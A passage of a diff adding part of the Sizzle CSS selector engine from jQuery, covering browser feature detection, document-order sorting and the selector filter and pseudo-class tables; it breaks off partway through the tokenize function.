+	return select( selector.replace( rtrim, "$1" ), context, results, seed );
+}
+
+/**
+ * Create key-value caches of limited size
+ * @returns {Function(string, Object)} Returns the Object data after storing it on itself with
+ *	property name the (space-suffixed) string and (if the cache is larger than Expr.cacheLength)
+ *	deleting the oldest entry
+ */
+function createCache() {
+	var keys = [];
+
+	function cache( key, value ) {
+		// Use (key + " ") to avoid collision with native prototype properties (see Issue #157)
+		if ( keys.push( key += " " ) > Expr.cacheLength ) {
+			// Only keep the most recent entries
+			delete cache[ keys.shift() ];
+		}
+		return (cache[ key ] = value);
+	}
+	return cache;
+}
+
+/**
+ * Mark a function for special use by Sizzle
+ * @param {Function} fn The function to mark
+ */
+function markFunction( fn ) {
+	fn[ expando ] = true;
+	return fn;
+}
+
+/**
+ * Support testing using an element
+ * @param {Function} fn Passed the created div and expects a boolean result
+ */
+function assert( fn ) {
+	var div = document.createElement("div");
+
+	try {
+		return !!fn( div );
+	} catch (e) {
+		return false;
+	} finally {
+		// Remove from its parent by default
+		if ( div.parentNode ) {
+			div.parentNode.removeChild( div );
+		}
+		// release memory in IE
+		div = null;
+	}
+}
+
+/**
+ * Adds the same handler for all of the specified attrs
+ * @param {String} attrs Pipe-separated list of attributes
+ * @param {Function} handler The method that will be applied
+ */
+function addHandle( attrs, handler ) {
+	var arr = attrs.split("|"),
+		i = attrs.length;
+
+	while ( i-- ) {
+		Expr.attrHandle[ arr[i] ] = handler;
+	}
+}
+
+/**
+ * Checks document order of two siblings
+ * @param {Element} a
+ * @param {Element} b
+ * @returns {Number} Returns less than 0 if a precedes b, greater than 0 if a follows b
+ */
+function siblingCheck( a, b ) {
+	var cur = b && a,
+		diff = cur && a.nodeType === 1 && b.nodeType === 1 &&
+			( ~b.sourceIndex || MAX_NEGATIVE ) -
+			( ~a.sourceIndex || MAX_NEGATIVE );
+
+	// Use IE sourceIndex if available on both nodes
+	if ( diff ) {
+		return diff;
+	}
+
+	// Check if b follows a
+	if ( cur ) {
+		while ( (cur = cur.nextSibling) ) {
+			if ( cur === b ) {
+				return -1;
+			}
+		}
+	}
+
+	return a ? 1 : -1;
+}
+
+/**
+ * Returns a function to use in pseudos for input types
+ * @param {String} type
+ */
+function createInputPseudo( type ) {
+	return function( elem ) {
+		var name = elem.nodeName.toLowerCase();
+		return name === "input" && elem.type === type;
+	};
+}
+
+/**
+ * Returns a function to use in pseudos for buttons
+ * @param {String} type
+ */
+function createButtonPseudo( type ) {
+	return function( elem ) {
+		var name = elem.nodeName.toLowerCase();
+		return (name === "input" || name === "button") && elem.type === type;
+	};
+}
+
+/**
+ * Returns a function to use in pseudos for positionals
+ * @param {Function} fn
+ */
+function createPositionalPseudo( fn ) {
+	return markFunction(function( argument ) {
+		argument = +argument;
+		return markFunction(function( seed, matches ) {
+			var j,
+				matchIndexes = fn( [], seed.length, argument ),
+				i = matchIndexes.length;
+
+			// Match elements found at the specified indexes
+			while ( i-- ) {
+				if ( seed[ (j = matchIndexes[i]) ] ) {
+					seed[j] = !(matches[j] = seed[j]);
+				}
+			}
+		});
+	});
+}
+
+/**
+ * Detect xml
+ * @param {Element|Object} elem An element or a document
+ */
+isXML = Sizzle.isXML = function( elem ) {
+	// documentElement is verified for cases where it doesn't yet exist
+	// (such as loading iframes in IE - #4833)
+	var documentElement = elem && (elem.ownerDocument || elem).documentElement;
+	return documentElement ? documentElement.nodeName !== "HTML" : false;
+};
+
+// Expose support vars for convenience
+support = Sizzle.support = {};
+
+/**
+ * Sets document-related variables once based on the current document
+ * @param {Element|Object} [doc] An element or document object to use to set the document
+ * @returns {Object} Returns the current document
+ */
+setDocument = Sizzle.setDocument = function( node ) {
+	var doc = node ? node.ownerDocument || node : preferredDoc,
+		parent = doc.defaultView;
+
+	// If no document and documentElement is available, return
+	if ( doc === document || doc.nodeType !== 9 || !doc.documentElement ) {
+		return document;
+	}
+
+	// Set our document
+	document = doc;
+	docElem = doc.documentElement;
+
+	// Support tests
+	documentIsHTML = !isXML( doc );
+
+	// Support: IE>8
+	// If iframe document is assigned to "document" variable and if iframe has been reloaded,
+	// IE will throw "permission denied" error when accessing "document" variable, see jQuery #13936
+	// IE6-8 do not support the defaultView property so parent will be undefined
+	if ( parent && parent.attachEvent && parent !== parent.top ) {
+		parent.attachEvent( "onbeforeunload", function() {
+			setDocument();
+		});
+	}
+
+	/* Attributes
+	---------------------------------------------------------------------- */
+
+	// Support: IE<8
+	// Verify that getAttribute really returns attributes and not properties (excepting IE8 booleans)
+	support.attributes = assert(function( div ) {
+		div.className = "i";
+		return !div.getAttribute("className");
+	});
+
+	/* getElement(s)By*
+	---------------------------------------------------------------------- */
+
+	// Check if getElementsByTagName("*") returns only elements
+	support.getElementsByTagName = assert(function( div ) {
+		div.appendChild( doc.createComment("") );
+		return !div.getElementsByTagName("*").length;
+	});
+
+	// Check if getElementsByClassName can be trusted
+	support.getElementsByClassName = assert(function( div ) {
+		div.innerHTML = "<div class='a'></div><div class='a i'></div>";
+
+		// Support: Safari<4
+		// Catch class over-caching
+		div.firstChild.className = "i";
+		// Support: Opera<10
+		// Catch gEBCN failure to find non-leading classes
+		return div.getElementsByClassName("i").length === 2;
+	});
+
+	// Support: IE<10
+	// Check if getElementById returns elements by name
+	// The broken getElementById methods don't pick up programatically-set names,
+	// so use a roundabout getElementsByName test
+	support.getById = assert(function( div ) {
+		docElem.appendChild( div ).id = expando;
+		return !doc.getElementsByName || !doc.getElementsByName( expando ).length;
+	});
+
+	// ID find and filter
+	if ( support.getById ) {
+		Expr.find["ID"] = function( id, context ) {
+			if ( typeof context.getElementById !== strundefined && documentIsHTML ) {
+				var m = context.getElementById( id );
+				// Check parentNode to catch when Blackberry 4.6 returns
+				// nodes that are no longer in the document #6963
+				return m && m.parentNode ? [m] : [];
+			}
+		};
+		Expr.filter["ID"] = function( id ) {
+			var attrId = id.replace( runescape, funescape );
+			return function( elem ) {
+				return elem.getAttribute("id") === attrId;
+			};
+		};
+	} else {
+		// Support: IE6/7
+		// getElementById is not reliable as a find shortcut
+		delete Expr.find["ID"];
+
+		Expr.filter["ID"] =  function( id ) {
+			var attrId = id.replace( runescape, funescape );
+			return function( elem ) {
+				var node = typeof elem.getAttributeNode !== strundefined && elem.getAttributeNode("id");
+				return node && node.value === attrId;
+			};
+		};
+	}
+
+	// Tag
+	Expr.find["TAG"] = support.getElementsByTagName ?
+		function( tag, context ) {
+			if ( typeof context.getElementsByTagName !== strundefined ) {
+				return context.getElementsByTagName( tag );
+			}
+		} :
+		function( tag, context ) {
+			var elem,
+				tmp = [],
+				i = 0,
+				results = context.getElementsByTagName( tag );
+
+			// Filter out possible comments
+			if ( tag === "*" ) {
+				while ( (elem = results[i++]) ) {
+					if ( elem.nodeType === 1 ) {
+						tmp.push( elem );
+					}
+				}
+
+				return tmp;
+			}
+			return results;
+		};
+
+	// Class
+	Expr.find["CLASS"] = support.getElementsByClassName && function( className, context ) {
+		if ( typeof context.getElementsByClassName !== strundefined && documentIsHTML ) {
+			return context.getElementsByClassName( className );
+		}
+	};
+
+	/* QSA/matchesSelector
+	---------------------------------------------------------------------- */
+
+	// QSA and matchesSelector support
+
+	// matchesSelector(:active) reports false when true (IE9/Opera 11.5)
+	rbuggyMatches = [];
+
+	// qSa(:focus) reports false when true (Chrome 21)
+	// We allow this because of a bug in IE8/9 that throws an error
+	// whenever `document.activeElement` is accessed on an iframe
+	// So, we allow :focus to pass through QSA all the time to avoid the IE error
+	// See http://bugs.jquery.com/ticket/13378
+	rbuggyQSA = [];
+
+	if ( (support.qsa = rnative.test( doc.querySelectorAll )) ) {
+		// Build QSA regex
+		// Regex strategy adopted from Diego Perini
+		assert(function( div ) {
+			// Select is set to empty string on purpose
+			// This is to test IE's treatment of not explicitly
+			// setting a boolean content attribute,
+			// since its presence should be enough
+			// http://bugs.jquery.com/ticket/12359
+			div.innerHTML = "<select><option selected=''></option></select>";
+
+			// Support: IE8
+			// Boolean attributes and "value" are not treated correctly
+			if ( !div.querySelectorAll("[selected]").length ) {
+				rbuggyQSA.push( "\\[" + whitespace + "*(?:value|" + booleans + ")" );
+			}
+
+			// Webkit/Opera - :checked should return selected option elements
+			// http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked
+			// IE8 throws error here and will not see later tests
+			if ( !div.querySelectorAll(":checked").length ) {
+				rbuggyQSA.push(":checked");
+			}
+		});
+
+		assert(function( div ) {
+
+			// Support: Opera 10-12/IE8
+			// ^= $= *= and empty values
+			// Should not select anything
+			// Support: Windows 8 Native Apps
+			// The type attribute is restricted during .innerHTML assignment
+			var input = doc.createElement("input");
+			input.setAttribute( "type", "hidden" );
+			div.appendChild( input ).setAttribute( "t", "" );
+
+			if ( div.querySelectorAll("[t^='']").length ) {
+				rbuggyQSA.push( "[*^$]=" + whitespace + "*(?:''|\"\")" );
+			}
+
+			// FF 3.5 - :enabled/:disabled and hidden elements (hidden elements are still enabled)
+			// IE8 throws error here and will not see later tests
+			if ( !div.querySelectorAll(":enabled").length ) {
+				rbuggyQSA.push( ":enabled", ":disabled" );
+			}
+
+			// Opera 10-11 does not throw on post-comma invalid pseudos
+			div.querySelectorAll("*,:x");
+			rbuggyQSA.push(",.*:");
+		});
+	}
+
+	if ( (support.matchesSelector = rnative.test( (matches = docElem.webkitMatchesSelector ||
+		docElem.mozMatchesSelector ||
+		docElem.oMatchesSelector ||
+		docElem.msMatchesSelector) )) ) {
+
+		assert(function( div ) {
+			// Check to see if it's possible to do matchesSelector
+			// on a disconnected node (IE 9)
+			support.disconnectedMatch = matches.call( div, "div" );
+
+			// This should fail with an exception
+			// Gecko does not error, returns false instead
+			matches.call( div, "[s!='']:x" );
+			rbuggyMatches.push( "!=", pseudos );
+		});
+	}
+
+	rbuggyQSA = rbuggyQSA.length && new RegExp( rbuggyQSA.join("|") );
+	rbuggyMatches = rbuggyMatches.length && new RegExp( rbuggyMatches.join("|") );
+
+	/* Contains
+	---------------------------------------------------------------------- */
+
+	// Element contains another
+	// Purposefully does not implement inclusive descendent
+	// As in, an element does not contain itself
+	contains = rnative.test( docElem.contains ) || docElem.compareDocumentPosition ?
+		function( a, b ) {
+			var adown = a.nodeType === 9 ? a.documentElement : a,
+				bup = b && b.parentNode;
+			return a === bup || !!( bup && bup.nodeType === 1 && (
+				adown.contains ?
+					adown.contains( bup ) :
+					a.compareDocumentPosition && a.compareDocumentPosition( bup ) & 16
+			));
+		} :
+		function( a, b ) {
+			if ( b ) {
+				while ( (b = b.parentNode) ) {
+					if ( b === a ) {
+						return true;
+					}
+				}
+			}
+			return false;
+		};
+
+	/* Sorting
+	---------------------------------------------------------------------- */
+
+	// Document order sorting
+	sortOrder = docElem.compareDocumentPosition ?
+	function( a, b ) {
+
+		// Flag for duplicate removal
+		if ( a === b ) {
+			hasDuplicate = true;
+			return 0;
+		}
+
+		var compare = b.compareDocumentPosition && a.compareDocumentPosition && a.compareDocumentPosition( b );
+
+		if ( compare ) {
+			// Disconnected nodes
+			if ( compare & 1 ||
+				(!support.sortDetached && b.compareDocumentPosition( a ) === compare) ) {
+
+				// Choose the first element that is related to our preferred document
+				if ( a === doc || contains(preferredDoc, a) ) {
+					return -1;
+				}
+				if ( b === doc || contains(preferredDoc, b) ) {
+					return 1;
+				}
+
+				// Maintain original order
+				return sortInput ?
+					( indexOf.call( sortInput, a ) - indexOf.call( sortInput, b ) ) :
+					0;
+			}
+
+			return compare & 4 ? -1 : 1;
+		}
+
+		// Not directly comparable, sort on existence of method
+		return a.compareDocumentPosition ? -1 : 1;
+	} :
+	function( a, b ) {
+		var cur,
+			i = 0,
+			aup = a.parentNode,
+			bup = b.parentNode,
+			ap = [ a ],
+			bp = [ b ];
+
+		// Exit early if the nodes are identical
+		if ( a === b ) {
+			hasDuplicate = true;
+			return 0;
+
+		// Parentless nodes are either documents or disconnected
+		} else if ( !aup || !bup ) {
+			return a === doc ? -1 :
+				b === doc ? 1 :
+				aup ? -1 :
+				bup ? 1 :
+				sortInput ?
+				( indexOf.call( sortInput, a ) - indexOf.call( sortInput, b ) ) :
+				0;
+
+		// If the nodes are siblings, we can do a quick check
+		} else if ( aup === bup ) {
+			return siblingCheck( a, b );
+		}
+
+		// Otherwise we need full lists of their ancestors for comparison
+		cur = a;
+		while ( (cur = cur.parentNode) ) {
+			ap.unshift( cur );
+		}
+		cur = b;
+		while ( (cur = cur.parentNode) ) {
+			bp.unshift( cur );
+		}
+
+		// Walk down the tree looking for a discrepancy
+		while ( ap[i] === bp[i] ) {
+			i++;
+		}
+
+		return i ?
+			// Do a sibling check if the nodes have a common ancestor
+			siblingCheck( ap[i], bp[i] ) :
+
+			// Otherwise nodes in our document sort first
+			ap[i] === preferredDoc ? -1 :
+			bp[i] === preferredDoc ? 1 :
+			0;
+	};
+
+	return doc;
+};
+
+Sizzle.matches = function( expr, elements ) {
+	return Sizzle( expr, null, null, elements );
+};
+
+Sizzle.matchesSelector = function( elem, expr ) {
+	// Set document vars if needed
+	if ( ( elem.ownerDocument || elem ) !== document ) {
+		setDocument( elem );
+	}
+
+	// Make sure that attribute selectors are quoted
+	expr = expr.replace( rattributeQuotes, "='$1']" );
+
+	if ( support.matchesSelector && documentIsHTML &&
+		( !rbuggyMatches || !rbuggyMatches.test( expr ) ) &&
+		( !rbuggyQSA     || !rbuggyQSA.test( expr ) ) ) {
+
+		try {
+			var ret = matches.call( elem, expr );
+
+			// IE 9's matchesSelector returns false on disconnected nodes
+			if ( ret || support.disconnectedMatch ||
+					// As well, disconnected nodes are said to be in a document
+					// fragment in IE 9
+					elem.document && elem.document.nodeType !== 11 ) {
+				return ret;
+			}
+		} catch(e) {}
+	}
+
+	return Sizzle( expr, document, null, [elem] ).length > 0;
+};
+
+Sizzle.contains = function( context, elem ) {
+	// Set document vars if needed
+	if ( ( context.ownerDocument || context ) !== document ) {
+		setDocument( context );
+	}
+	return contains( context, elem );
+};
+
+Sizzle.attr = function( elem, name ) {
+	// Set document vars if needed
+	if ( ( elem.ownerDocument || elem ) !== document ) {
+		setDocument( elem );
+	}
+
+	var fn = Expr.attrHandle[ name.toLowerCase() ],
+		// Don't get fooled by Object.prototype properties (jQuery #13807)
+		val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?
+			fn( elem, name, !documentIsHTML ) :
+			undefined;
+
+	return val === undefined ?
+		support.attributes || !documentIsHTML ?
+			elem.getAttribute( name ) :
+			(val = elem.getAttributeNode(name)) && val.specified ?
+				val.value :
+				null :
+		val;
+};
+
+Sizzle.error = function( msg ) {
+	throw new Error( "Syntax error, unrecognized expression: " + msg );
+};
+
+/**
+ * Document sorting and removing duplicates
+ * @param {ArrayLike} results
+ */
+Sizzle.uniqueSort = function( results ) {
+	var elem,
+		duplicates = [],
+		j = 0,
+		i = 0;
+
+	// Unless we *know* we can detect duplicates, assume their presence
+	hasDuplicate = !support.detectDuplicates;
+	sortInput = !support.sortStable && results.slice( 0 );
+	results.sort( sortOrder );
+
+	if ( hasDuplicate ) {
+		while ( (elem = results[i++]) ) {
+			if ( elem === results[ i ] ) {
+				j = duplicates.push( i );
+			}
+		}
+		while ( j-- ) {
+			results.splice( duplicates[ j ], 1 );
+		}
+	}
+
+	return results;
+};
+
+/**
+ * Utility function for retrieving the text value of an array of DOM nodes
+ * @param {Array|Element} elem
+ */
+getText = Sizzle.getText = function( elem ) {
+	var node,
+		ret = "",
+		i = 0,
+		nodeType = elem.nodeType;
+
+	if ( !nodeType ) {
+		// If no nodeType, this is expected to be an array
+		for ( ; (node = elem[i]); i++ ) {
+			// Do not traverse comment nodes
+			ret += getText( node );
+		}
+	} else if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) {
+		// Use textContent for elements
+		// innerText usage removed for consistency of new lines (see #11153)
+		if ( typeof elem.textContent === "string" ) {
+			return elem.textContent;
+		} else {
+			// Traverse its children
+			for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) {
+				ret += getText( elem );
+			}
+		}
+	} else if ( nodeType === 3 || nodeType === 4 ) {
+		return elem.nodeValue;
+	}
+	// Do not include comment or processing instruction nodes
+
+	return ret;
+};
+
+Expr = Sizzle.selectors = {
+
+	// Can be adjusted by the user
+	cacheLength: 50,
+
+	createPseudo: markFunction,
+
+	match: matchExpr,
+
+	attrHandle: {},
+
+	find: {},
+
+	relative: {
+		">": { dir: "parentNode", first: true },
+		" ": { dir: "parentNode" },
+		"+": { dir: "previousSibling", first: true },
+		"~": { dir: "previousSibling" }
+	},
+
+	preFilter: {
+		"ATTR": function( match ) {
+			match[1] = match[1].replace( runescape, funescape );
+
+			// Move the given value to match[3] whether quoted or unquoted
+			match[3] = ( match[4] || match[5] || "" ).replace( runescape, funescape );
+
+			if ( match[2] === "~=" ) {
+				match[3] = " " + match[3] + " ";
+			}
+
+			return match.slice( 0, 4 );
+		},
+
+		"CHILD": function( match ) {
+			/* matches from matchExpr["CHILD"]
+				1 type (only|nth|...)
+				2 what (child|of-type)
+				3 argument (even|odd|\d*|\d*n([+-]\d+)?|...)
+				4 xn-component of xn+y argument ([+-]?\d*n|)
+				5 sign of xn-component
+				6 x of xn-component
+				7 sign of y-component
+				8 y of y-component
+			*/
+			match[1] = match[1].toLowerCase();
+
+			if ( match[1].slice( 0, 3 ) === "nth" ) {
+				// nth-* requires argument
+				if ( !match[3] ) {
+					Sizzle.error( match[0] );
+				}
+
+				// numeric x and y parameters for Expr.filter.CHILD
+				// remember that false/true cast respectively to 0/1
+				match[4] = +( match[4] ? match[5] + (match[6] || 1) : 2 * ( match[3] === "even" || match[3] === "odd" ) );
+				match[5] = +( ( match[7] + match[8] ) || match[3] === "odd" );
+
+			// other types prohibit arguments
+			} else if ( match[3] ) {
+				Sizzle.error( match[0] );
+			}
+
+			return match;
+		},
+
+		"PSEUDO": function( match ) {
+			var excess,
+				unquoted = !match[5] && match[2];
+
+			if ( matchExpr["CHILD"].test( match[0] ) ) {
+				return null;
+			}
+
+			// Accept quoted arguments as-is
+			if ( match[3] && match[4] !== undefined ) {
+				match[2] = match[4];
+
+			// Strip excess characters from unquoted arguments
+			} else if ( unquoted && rpseudo.test( unquoted ) &&
+				// Get excess from tokenize (recursively)
+				(excess = tokenize( unquoted, true )) &&
+				// advance to the next closing parenthesis
+				(excess = unquoted.indexOf( ")", unquoted.length - excess ) - unquoted.length) ) {
+
+				// excess is a negative index
+				match[0] = match[0].slice( 0, excess );
+				match[2] = unquoted.slice( 0, excess );
+			}
+
+			// Return only captures needed by the pseudo filter method (type and argument)
+			return match.slice( 0, 3 );
+		}
+	},
+
+	filter: {
+
+		"TAG": function( nodeNameSelector ) {
+			var nodeName = nodeNameSelector.replace( runescape, funescape ).toLowerCase();
+			return nodeNameSelector === "*" ?
+				function() { return true; } :
+				function( elem ) {
+					return elem.nodeName && elem.nodeName.toLowerCase() === nodeName;
+				};
+		},
+
+		"CLASS": function( className ) {
+			var pattern = classCache[ className + " " ];
+
+			return pattern ||
+				(pattern = new RegExp( "(^|" + whitespace + ")" + className + "(" + whitespace + "|$)" )) &&
+				classCache( className, function( elem ) {
+					return pattern.test( typeof elem.className === "string" && elem.className || typeof elem.getAttribute !== strundefined && elem.getAttribute("class") || "" );
+				});
+		},
+
+		"ATTR": function( name, operator, check ) {
+			return function( elem ) {
+				var result = Sizzle.attr( elem, name );
+
+				if ( result == null ) {
+					return operator === "!=";
+				}
+				if ( !operator ) {
+					return true;
+				}
+
+				result += "";
+
+				return operator === "=" ? result === check :
+					operator === "!=" ? result !== check :
+					operator === "^=" ? check && result.indexOf( check ) === 0 :
+					operator === "*=" ? check && result.indexOf( check ) > -1 :
+					operator === "$=" ? check && result.slice( -check.length ) === check :
+					operator === "~=" ? ( " " + result + " " ).indexOf( check ) > -1 :
+					operator === "|=" ? result === check || result.slice( 0, check.length + 1 ) === check + "-" :
+					false;
+			};
+		},
+
+		"CHILD": function( type, what, argument, first, last ) {
+			var simple = type.slice( 0, 3 ) !== "nth",
+				forward = type.slice( -4 ) !== "last",
+				ofType = what === "of-type";
+
+			return first === 1 && last === 0 ?
+
+				// Shortcut for :nth-*(n)
+				function( elem ) {
+					return !!elem.parentNode;
+				} :
+
+				function( elem, context, xml ) {
+					var cache, outerCache, node, diff, nodeIndex, start,
+						dir = simple !== forward ? "nextSibling" : "previousSibling",
+						parent = elem.parentNode,
+						name = ofType && elem.nodeName.toLowerCase(),
+						useCache = !xml && !ofType;
+
+					if ( parent ) {
+
+						// :(first|last|only)-(child|of-type)
+						if ( simple ) {
+							while ( dir ) {
+								node = elem;
+								while ( (node = node[ dir ]) ) {
+									if ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) {
+										return false;
+									}
+								}
+								// Reverse direction for :only-* (if we haven't yet done so)
+								start = dir = type === "only" && !start && "nextSibling";
+							}
+							return true;
+						}
+
+						start = [ forward ? parent.firstChild : parent.lastChild ];
+
+						// non-xml :nth-child(...) stores cache data on `parent`
+						if ( forward && useCache ) {
+							// Seek `elem` from a previously-cached index
+							outerCache = parent[ expando ] || (parent[ expando ] = {});
+							cache = outerCache[ type ] || [];
+							nodeIndex = cache[0] === dirruns && cache[1];
+							diff = cache[0] === dirruns && cache[2];
+							node = nodeIndex && parent.childNodes[ nodeIndex ];
+
+							while ( (node = ++nodeIndex && node && node[ dir ] ||
+
+								// Fallback to seeking `elem` from the start
+								(diff = nodeIndex = 0) || start.pop()) ) {
+
+								// When found, cache indexes on `parent` and break
+								if ( node.nodeType === 1 && ++diff && node === elem ) {
+									outerCache[ type ] = [ dirruns, nodeIndex, diff ];
+									break;
+								}
+							}
+
+						// Use previously-cached element index if available
+						} else if ( useCache && (cache = (elem[ expando ] || (elem[ expando ] = {}))[ type ]) && cache[0] === dirruns ) {
+							diff = cache[1];
+
+						// xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...)
+						} else {
+							// Use the same loop as above to seek `elem` from the start
+							while ( (node = ++nodeIndex && node && node[ dir ] ||
+								(diff = nodeIndex = 0) || start.pop()) ) {
+
+								if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {
+									// Cache the index of each encountered element
+									if ( useCache ) {
+										(node[ expando ] || (node[ expando ] = {}))[ type ] = [ dirruns, diff ];
+									}
+
+									if ( node === elem ) {
+										break;
+									}
+								}
+							}
+						}
+
+						// Incorporate the offset, then check against cycle size
+						diff -= last;
+						return diff === first || ( diff % first === 0 && diff / first >= 0 );
+					}
+				};
+		},
+
+		"PSEUDO": function( pseudo, argument ) {
+			// pseudo-class names are case-insensitive
+			// http://www.w3.org/TR/selectors/#pseudo-classes
+			// Prioritize by case sensitivity in case custom pseudos are added with uppercase letters
+			// Remember that setFilters inherits from pseudos
+			var args,
+				fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] ||
+					Sizzle.error( "unsupported pseudo: " + pseudo );
+
+			// The user may use createPseudo to indicate that
+			// arguments are needed to create the filter function
+			// just as Sizzle does
+			if ( fn[ expando ] ) {
+				return fn( argument );
+			}
+
+			// But maintain support for old signatures
+			if ( fn.length > 1 ) {
+				args = [ pseudo, pseudo, "", argument ];
+				return Expr.setFilters.hasOwnProperty( pseudo.toLowerCase() ) ?
+					markFunction(function( seed, matches ) {
+						var idx,
+							matched = fn( seed, argument ),
+							i = matched.length;
+						while ( i-- ) {
+							idx = indexOf.call( seed, matched[i] );
+							seed[ idx ] = !( matches[ idx ] = matched[i] );
+						}
+					}) :
+					function( elem ) {
+						return fn( elem, 0, args );
+					};
+			}
+
+			return fn;
+		}
+	},
+
+	pseudos: {
+		// Potentially complex pseudos
+		"not": markFunction(function( selector ) {
+			// Trim the selector passed to compile
+			// to avoid treating leading and trailing
+			// spaces as combinators
+			var input = [],
+				results = [],
+				matcher = compile( selector.replace( rtrim, "$1" ) );
+
+			return matcher[ expando ] ?
+				markFunction(function( seed, matches, context, xml ) {
+					var elem,
+						unmatched = matcher( seed, null, xml, [] ),
+						i = seed.length;
+
+					// Match elements unmatched by `matcher`
+					while ( i-- ) {
+						if ( (elem = unmatched[i]) ) {
+							seed[i] = !(matches[i] = elem);
+						}
+					}
+				}) :
+				function( elem, context, xml ) {
+					input[0] = elem;
+					matcher( input, null, xml, results );
+					return !results.pop();
+				};
+		}),
+
+		"has": markFunction(function( selector ) {
+			return function( elem ) {
+				return Sizzle( selector, elem ).length > 0;
+			};
+		}),
+
+		"contains": markFunction(function( text ) {
+			return function( elem ) {
+				return ( elem.textContent || elem.innerText || getText( elem ) ).indexOf( text ) > -1;
+			};
+		}),
+
+		// "Whether an element is represented by a :lang() selector
+		// is based solely on the element's language value
+		// being equal to the identifier C,
+		// or beginning with the identifier C immediately followed by "-".
+		// The matching of C against the element's language value is performed case-insensitively.
+		// The identifier C does not have to be a valid language name."
+		// http://www.w3.org/TR/selectors/#lang-pseudo
+		"lang": markFunction( function( lang ) {
+			// lang value must be a valid identifier
+			if ( !ridentifier.test(lang || "") ) {
+				Sizzle.error( "unsupported lang: " + lang );
+			}
+			lang = lang.replace( runescape, funescape ).toLowerCase();
+			return function( elem ) {
+				var elemLang;
+				do {
+					if ( (elemLang = documentIsHTML ?
+						elem.lang :
+						elem.getAttribute("xml:lang") || elem.getAttribute("lang")) ) {
+
+						elemLang = elemLang.toLowerCase();
+						return elemLang === lang || elemLang.indexOf( lang + "-" ) === 0;
+					}
+				} while ( (elem = elem.parentNode) && elem.nodeType === 1 );
+				return false;
+			};
+		}),
+
+		// Miscellaneous
+		"target": function( elem ) {
+			var hash = window.location && window.location.hash;
+			return hash && hash.slice( 1 ) === elem.id;
+		},
+
+		"root": function( elem ) {
+			return elem === docElem;
+		},
+
+		"focus": function( elem ) {
+			return elem === document.activeElement && (!document.hasFocus || document.hasFocus()) && !!(elem.type || elem.href || ~elem.tabIndex);
+		},
+
+		// Boolean properties
+		"enabled": function( elem ) {
+			return elem.disabled === false;
+		},
+
+		"disabled": function( elem ) {
+			return elem.disabled === true;
+		},
+
+		"checked": function( elem ) {
+			// In CSS3, :checked should return both checked and selected elements
+			// http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked
+			var nodeName = elem.nodeName.toLowerCase();
+			return (nodeName === "input" && !!elem.checked) || (nodeName === "option" && !!elem.selected);
+		},
+
+		"selected": function( elem ) {
+			// Accessing this property makes selected-by-default
+			// options in Safari work properly
+			if ( elem.parentNode ) {
+				elem.parentNode.selectedIndex;
+			}
+
+			return elem.selected === true;
+		},
+
+		// Contents
+		"empty": function( elem ) {
+			// http://www.w3.org/TR/selectors/#empty-pseudo
+			// :empty is only affected by element nodes and content nodes(including text(3), cdata(4)),
+			//   not comment, processing instructions, or others
+			// Thanks to Diego Perini for the nodeName shortcut
+			//   Greater than "@" means alpha characters (specifically not starting with "#" or "?")
+			for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) {
+				if ( elem.nodeName > "@" || elem.nodeType === 3 || elem.nodeType === 4 ) {
+					return false;
+				}
+			}
+			return true;
+		},
+
+		"parent": function( elem ) {
+			return !Expr.pseudos["empty"]( elem );
+		},
+
+		// Element/input types
+		"header": function( elem ) {
+			return rheader.test( elem.nodeName );
+		},
+
+		"input": function( elem ) {
+			return rinputs.test( elem.nodeName );
+		},
+
+		"button": function( elem ) {
+			var name = elem.nodeName.toLowerCase();
+			return name === "input" && elem.type === "button" || name === "button";
+		},
+
+		"text": function( elem ) {
+			var attr;
+			// IE6 and 7 will map elem.type to 'text' for new HTML5 types (search, etc)
+			// use getAttribute instead to test this case
+			return elem.nodeName.toLowerCase() === "input" &&
+				elem.type === "text" &&
+				( (attr = elem.getAttribute("type")) == null || attr.toLowerCase() === elem.type );
+		},
+
+		// Position-in-collection
+		"first": createPositionalPseudo(function() {
+			return [ 0 ];
+		}),
+
+		"last": createPositionalPseudo(function( matchIndexes, length ) {
+			return [ length - 1 ];
+		}),
+
+		"eq": createPositionalPseudo(function( matchIndexes, length, argument ) {
+			return [ argument < 0 ? argument + length : argument ];
+		}),
+
+		"even": createPositionalPseudo(function( matchIndexes, length ) {
+			var i = 0;
+			for ( ; i < length; i += 2 ) {
+				matchIndexes.push( i );
+			}
+			return matchIndexes;
+		}),
+
+		"odd": createPositionalPseudo(function( matchIndexes, length ) {
+			var i = 1;
+			for ( ; i < length; i += 2 ) {
+				matchIndexes.push( i );
+			}
+			return matchIndexes;
+		}),
+
+		"lt": createPositionalPseudo(function( matchIndexes, length, argument ) {
+			var i = argument < 0 ? argument + length : argument;
+			for ( ; --i >= 0; ) {
+				matchIndexes.push( i );
+			}
+			return matchIndexes;
+		}),
+
+		"gt": createPositionalPseudo(function( matchIndexes, length, argument ) {
+			var i = argument < 0 ? argument + length : argument;
+			for ( ; ++i < length; ) {
+				matchIndexes.push( i );
+			}
+			return matchIndexes;
+		})
+	}
+};
+
+Expr.pseudos["nth"] = Expr.pseudos["eq"];
+
+// Add button/input type pseudos
+for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
+	Expr.pseudos[ i ] = createInputPseudo( i );
+}
+for ( i in { submit: true, reset: true } ) {
+	Expr.pseudos[ i ] = createButtonPseudo( i );
+}
+
+// Easy API for creating new setFilters
+function setFilters() {}
+setFilters.prototype = Expr.filters = Expr.pseudos;
+Expr.setFilters = new setFilters();
+
+function tokenize( selector, parseOnly ) {
+	var matched, match, tokens, type,
+		soFar, groups, preFilters,
+		cached = tokenCache[ selector + " " ];
+
+	if ( cached ) {
+		return parseOnly ? 0 : cached.slice( 0 );
+	}
+
+	soFar = selector;
+	groups = [];
+	preFilters = Expr.preFilter;
+
+	while ( soFar ) {
+
+		// Comma and first run
+		if ( !matched || (match = rcomma.exec( soFar )) ) {
+			if ( match ) {
+				// Don't consume trailing commas as valid
